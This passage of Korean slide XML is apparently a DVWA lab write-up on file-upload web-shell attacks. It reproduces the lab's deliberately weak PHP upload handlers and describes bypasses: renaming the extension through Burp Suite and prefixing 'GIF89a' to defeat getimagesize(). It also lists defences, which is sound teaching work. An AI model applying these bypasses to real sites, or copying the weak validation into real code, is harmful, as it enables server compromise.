              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>해당 공격에 대한 대응책은 다음과 같다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"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270000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="270000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일 확장자를 제한한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"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ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>웹쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 공격은 개요에서 설명했듯이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>특정한 확장자를 업로드 할 수 있는 취약점에서 비롯한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>따라서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>웹쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 공격에 사용되는 확장자를 블랙리스트로 관리하거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>게시판의 응용에 맞는 확장자만을 화이트리스트로 관리하는 방식으로 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"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160291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방어 대책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968497"/>
            <a:ext cx="2914650" cy="7509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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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if(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isset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$_POST[ 'Upload' ] ) ) {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// Where are we going to be writing to?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800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";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800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> .=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basename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$_FILES[ 'uploaded' ][ 'name' ] );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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// File information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uploaded_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> = $_FILES[ 'uploaded' ][ 'name' ];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uploaded_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> = $_FILES[ 'uploaded' ][ 'type' ];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uploaded_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> = $_FILES[ 'uploaded' ][ 'size' ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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// Is it an image?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if( (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uploaded_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> == "image/jpeg" ||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uploaded_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> == "image/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png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>" ) &amp;&amp;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(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uploaded_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> &lt; 100000 ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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// Can we move the file to the upload folder?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if( !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move_uploaded_file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$_FILES[ 'uploaded' ][ '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tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>' ],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800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> ) ) {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    // No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    echo '&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;';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}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else {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    // Yes!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    echo "&lt;pre&gt;{$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800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>}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succesfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> uploaded!&lt;/pre&gt;";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}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}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else {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// Invalid file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echo '&lt;pre&gt;Your image was not uploaded. We can only accept JPEG or PNG images.&lt;/pre&gt;';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}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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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?&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50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B14E246-3735-4402-8A45-4F2559D8C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968498"/>
            <a:ext cx="2914650" cy="695378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70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Midium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에서는 파일 확장자명을 제한하는 방식으로 보호 되어 있어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Low Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에서 시행했던 공격 방식이 불가능했다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Midium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>공격은 프록시 기능을 하는 버프 스위트를 사용함으로써</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>해결할 수 있었다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>사진 파일이 아닌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일을 생성해 전송하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 필터링을 지난 후에 파일 확장자명을 다시 바꿔주는 방식이었다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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 해당 공격에 대한 대응책은 다음과 같다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70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="270000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>업로드하는 파일이 사진 파일임을 증명하는 과정을 거친다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altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Midium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에서는 사진 파일이 아닌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이 진짜 사진 파일인 것처럼 가장해 필터링 과정을 지난 후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>프록시 서버를 통해 다시 원래의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 파일로 돌려주어 스크립트가 정상적으로 작동하도록 설계하였다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>필터링 과정에서 파일의 확장자명만 보고 판별하는 것이 아니라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>사진의 크기를 가져오는 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>등을 이용해 실제 사진 파일이 맞는지를 판별하는 과정을 추가함으로써 대응할 수 있다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874434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3-5) File Upload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방어 대책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968497"/>
            <a:ext cx="2914650" cy="75093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&lt;?php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if(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isset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$_POST[ 'Upload' ] ) ) {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// Where are we going to be writing to?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800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";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800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> .=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basename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$_FILES[ 'uploaded' ][ 'name' ] );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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// File information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uploaded_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> = $_FILES[ 'uploaded' ][ 'name' ];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uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>  =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substr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uploaded_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,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strrpos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uploaded_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, '.' ) + 1);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uploaded_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> = $_FILES[ 'uploaded' ][ 'size' ];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uploaded_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>  = $_FILES[ 'uploaded' ][ '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tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>' ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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// Is it an image?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if( (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strtolower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uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> ) == "jpg" ||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strtolower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uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> ) == "jpeg" ||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strtolower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uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> ) == "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png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>" ) &amp;&amp;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(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uploaded_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> &lt; 100000 ) &amp;&amp;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getimagesize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uploaded_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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// Can we move the file to the upload folder?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if( !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move_uploaded_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(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uploaded_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 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800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> ) ) {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    // No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    echo '&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;';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}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else {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    // Yes!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    echo "&lt;pre&gt;{$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target_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>succesfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> uploaded!&lt;/pre&gt;";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}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}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else {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// Invalid file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    echo '&lt;pre&gt;Your image was not uploaded. We can only accept JPEG or PNG images.&lt;/pre&gt;';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    }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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRP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B14E246-3735-4402-8A45-4F2559D8C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968498"/>
            <a:ext cx="2914650" cy="695378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270000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>High Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>함수로 해당 파일이 실제 이미지 파일이 맞는지 확인하는 절차를 거치기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 실제 이미지 파일이 갖는 값을 가지는 파일을 전송해야 한다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 High Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 공격은 구문 앞에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>GIF89a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>라는 값을 추가하여 이미지인지 확인하는 과정을 넘어갈 수 있도록 하였다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>해당 공격에 대한 대응책은 다음과 같다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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
